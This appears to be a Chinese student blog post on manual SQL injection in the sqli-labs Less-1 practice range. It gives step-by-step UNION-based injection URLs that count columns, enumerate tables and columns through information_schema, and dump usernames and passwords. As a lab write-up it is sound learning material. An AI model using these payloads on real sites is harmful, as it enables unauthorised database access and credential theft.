【学员分享】基于sql注入的sqli-lab靶场的手工注入

本文作者:啊昊(WEB安全攻防星球学员)

一、尝试


初始化页面如图

输入?id=1,后得到返回页面:

尝试单引号测试:?id=1',发现存在注入点

二、开始sql注入


1、找出页面中背后的数据表中列的数量

http://www.f.com/sqli-labs-master/Less-1/?id=1' or 1=2 order by 3 %23

不断尝试,当我们发现order by 4 时,出现报错

2、检测哪一列可以显示,并查处数据库名字和版本

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,3 %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,database(),version() %23

3、查询数据库中表的数量以及名称,并找出可能存在敏感信息的 表

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(*),2 from information_schema.TABLES where TABLE_SCHEMA='security'

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 0,1

不断尝试,发现以下表中可能有敏感信息:

4、查处users表中的字段数以及名称

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(COLUMN_NAME),2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1%23

可以看出,该表字段数为3,依次是id,username,password

5、查询username,和password的值

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,concat(username,'---',password),2 from users %23

到此告一段落了!

总结


与之前的sqlmap注入相比较,发现手工注入需要更多的逻辑,心里要很清楚下一步代码该做什么,中 途会因为代码的一点错误导致页面报错。然后使用sqlmap这种工具的话,通过命令的方法就可以得到 想要的结果,速度也快。

在公众号回复"sql天书",即可获得sqli-lab靶场使用手册。【成就未解锁

扫描下方二维码加入WEB安全星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

目前25000+人已关注加入我们


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值